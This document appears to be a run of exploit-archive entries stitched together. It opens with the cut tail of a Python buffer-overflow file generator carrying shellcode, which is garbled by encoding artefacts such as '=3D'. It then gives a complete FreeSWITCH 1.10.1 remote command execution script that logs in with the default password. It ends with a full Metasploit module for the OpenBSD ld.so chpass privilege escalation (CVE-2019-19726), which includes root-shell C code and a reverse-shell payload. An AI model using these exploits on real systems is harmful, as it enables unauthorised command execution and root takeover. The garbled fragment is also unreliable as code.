"\x1e\x4b\x5c\xb8\x69\x70\xcb\xef\x3e\x46\x02\x65\xd3" "\xf1\xbc\x9b\x2e\x67\x86\x1f\xf5\x54\x09\x9e\x78\xe0" "\x2d\xb0\x44\xe9\x69\xe4\x18\xbc\x27\x52\xdf\x16\x86" "\x0c\x89\xc5\x40\xd8\x4c\x26\x53\x9e\x50\x63\x25\x7e" "\xe0\xda\x70\x81\xcd\x8a\x74\xfa\x33\x2b\x7a\xd1\xf7" "\x5b\x31\x7b\x51\xf4\x9c\xee\xe3\x99\x1e\xc5\x20\xa4" "\x9c\xef\xd8\x53\xbc\x9a\xdd\x18\x7a\x77\xac\x31\xef" "\x77\x03\x31\x3a") payload =3D buffer + nseh + seh + nops + shellcode try: Dopen("Evil.txt","w") print "[+] Creating %s bytes evil payload.." %len(payload) f.write(payload) f.close() print "[+] File created!" except: print "File cannot be created"

# Exploit Title: FreeSWITCH 1.10.1 - Command Execution # Date: 2019-12-19 # Exploit Author: 1F98D # Vendor Homepage: https://freeswitch.com/ # Software Link: https://files.freeswitch.org/windows/installer/x64/FreeSWITCH-1.10.1-Release-x64.msi # Version: 1.10.1 # Tested on: Windows 10 (x64) # # FreeSWITCH listens on port 8021 by default and will accept and run commands sent to # it after authenticating. By default commands are not accepted from remote hosts. # # -- Example -- # root@kali:~# ./freeswitch-exploit.py 192.168.1.100 whoami # Authenticated # Content-Type: api/response # Content-Length: 20 # # nt authority\system # #!/usr/bin/python3 from socket import * import sys if len(sys.argv) != 3: print('Missing arguments') print('Usage: freeswitch-exploit.py <target> <cmd>') sys.exit(1) ADDRESS=sys.argv[1] CMD=sys.argv[2] PASSWORD='ClueCon' # default password for FreeSWITCH s=socket(AF_INET, SOCK_STREAM) s.connect((ADDRESS, 8021)) response = s.recv(1024) if b'auth/request' in response: s.send(bytes('auth {}\n\n'.format(PASSWORD), 'utf8')) response = s.recv(1024) if b'+OK accepted' in response: print('Authenticated') s.send(bytes('api system {}\n\n'.format(CMD), 'utf8')) response = s.recv(8096).decode() print(response) else: print('Authentication failed') sys.exit(1) else: print('Not prompted for authentication, likely not vulnerable') sys.exit(1)

## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Local Rank = ExcellentRanking include Msf::Post::File include Msf::Exploit::EXE include Msf::Exploit::FileDropper def initialize(info = {}) super(update_info(info, 'Name' => 'OpenBSD Dynamic Loader chpass Privilege Escalation', 'Description' => %q{ This module exploits a vulnerability in the OpenBSD `ld.so` dynamic loader (CVE-2019-19726). The `_dl_getenv()` function fails to reset the `LD_LIBRARY_PATH` environment variable when set with approximately `ARG_MAX` colons. This can be abused to load `libutil.so` from an untrusted path, using `LD_LIBRARY_PATH` in combination with the `chpass` set-uid executable, resulting in privileged code execution. This module has been tested successfully on: OpenBSD 6.1 (amd64); and OpenBSD 6.6 (amd64) }, 'License' => MSF_LICENSE, 'Author' => [ 'Qualys', # Discovery and exploit 'bcoles' # Metasploit ], 'DisclosureDate' => '2019-12-11', 'Platform' => %w[bsd unix], # OpenBSD 'Arch' => [ARCH_CMD], 'SessionTypes' => ['shell'], 'References' => [ ['CVE', '2019-19726'], ['EDB', '47780'], ['URL', 'https://blog.qualys.com/laws-of-vulnerabilities/2019/12/11/openbsd-local-privilege-escalation-vulnerability-cve-2019-19726'], ['URL', 'https://www.qualys.com/2019/12/11/cve-2019-19726/local-privilege-escalation-openbsd-dynamic-loader.txt'], ['URL', 'https://www.openwall.com/lists/oss-security/2019/12/11/9'], ['URL', 'https://github.com/bcoles/local-exploits/blob/master/CVE-2019-19726/openbsd-dynamic-loader-chpass'], ['URL', 'https://ftp.openbsd.org/pub/OpenBSD/patches/6.6/common/013_ldso.patch.sig'] ], 'Targets' => [['Automatic', {}]], 'DefaultOptions' => { 'PAYLOAD' => 'cmd/unix/reverse', 'WfsDelay' => 10 }, 'DefaultTarget' => 0)) register_options [ OptString.new('CHPASS_PATH', [true, 'Path to chpass', '/usr/bin/chpass']) ] register_advanced_options [ OptBool.new('ForceExploit', [false, 'Override check result', false]), OptString.new('WritableDir', [true, 'A directory where we can write files', '/tmp']) ] end def base_dir datastore['WritableDir'].to_s end def chpass_path datastore['CHPASS_PATH'] end def upload(path, data) print_status "Writing '#{path}' (#{data.size} bytes) ..." rm_f path write_file path, data register_file_for_cleanup path end def is_root? (cmd_exec('id -u').to_s.gsub(/[^\d]/, '') == '0') end def libutil_name return unless command_exists? 'readelf' cmd_exec('readelf -a /usr/sbin/pwd_mkdb').to_s.scan(/\[(libutil\.so\.[\d\.]+)\]/).flatten.first end def check patches = cmd_exec('syspatch -l').to_s patch = '013_ldso' if patches.include? patch vprint_error "Patch #{patch} has been installed. Target is not vulnerable." return CheckCode::Safe end vprint_good "Patch #{patch} is not present" unless command_exists? 'cc' vprint_error 'cc is not installed' return CheckCode::Safe end print_good 'cc is installed' CheckCode::Detected end def exploit unless check == CheckCode::Detected unless datastore['ForceExploit'] fail_with Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.' end print_warning 'Target does not appear to be vulnerable' end if is_root? unless datastore['ForceExploit'] fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.' end end unless writable? base_dir fail_with Failure::BadConfig, "#{base_dir} is not writable" end # Qualys set-uid shared object from https://www.openwall.com/lists/oss-security/2019/12/11/9 lib_data = <<-EOF #include <paths.h> #include <unistd.h> static void __attribute__ ((constructor)) _init (void) { if (setuid(0) != 0) _exit(__LINE__); if (setgid(0) != 0) _exit(__LINE__); char * const argv[] = { _PATH_KSHELL, "-c", _PATH_KSHELL "; exit 1", NULL }; execve(argv[0], argv, NULL); _exit(__LINE__); } EOF libs = [] lib = libutil_name if lib libs << lib print_good "Found libutil.so name: #{lib}" else libs << 'libutil.so.12.1' libs << 'libutil.so.13.1' print_warning "Could not determine libutil.so name. Using: #{libs.join(', ')}" end lib_src_path = "#{base_dir}/.#{rand_text_alphanumeric 5..10}.c" upload lib_src_path, lib_data libs.each do |lib_name| lib_path = "#{base_dir}/#{lib_name}" print_status "Compiling #{lib_path} ..." output = cmd_exec "cc -fpic -shared -s -o #{lib_path} #{lib_src_path} -Wall" register_file_for_cleanup lib_path unless output.blank? print_error output fail_with Failure::Unknown, "#{lib_path}.c failed to compile" end end # Qualys exploit from https://www.openwall.com/lists/oss-security/2019/12/11/9 exploit_data = <<-EOF #include <string.h> #include <sys/param.h> #include <sys/resource.h> #include <unistd.h> int main(int argc, char * const * argv) { #define LLP "LD_LIBRARY_PATH=." static char llp[ARG_MAX - 128]; memset(llp, ':', sizeof(llp)-1); memcpy(llp, LLP, sizeof(LLP)-1); char * const envp[] = { llp, "EDITOR=echo '#' >>", NULL }; #define DATA (ARG_MAX * sizeof(char *)) const struct rlimit data = { DATA, DATA }; if (setrlimit(RLIMIT_DATA, &data) != 0) _exit(__LINE__); if (argc <= 1) _exit(__LINE__); argv += 1; execve(argv[0], argv, envp); _exit(__LINE__); } EOF exploit_path = "#{base_dir}/.#{rand_text_alphanumeric 5..10}" upload "#{exploit_path}.c", exploit_data print_status "Compiling #{exploit_path} ..." output = cmd_exec "cc -s #{exploit_path}.c -o #{exploit_path} -Wall" register_file_for_cleanup exploit_path unless output.blank? print_error output fail_with Failure::Unknown, "#{exploit_path}.c failed to compile" end payload_path = "#{base_dir}/.#{rand_text_alphanumeric 5..10}" upload payload_path, "#!/bin/sh\n#{payload.encoded}\n" chmod payload_path print_status 'Launching exploit...' output = cmd_exec("cd #{base_dir};echo '#{payload_path}&exit'|#{exploit_path} #{chpass_path}") output.each_line { |line| vprint_status line.chomp } end end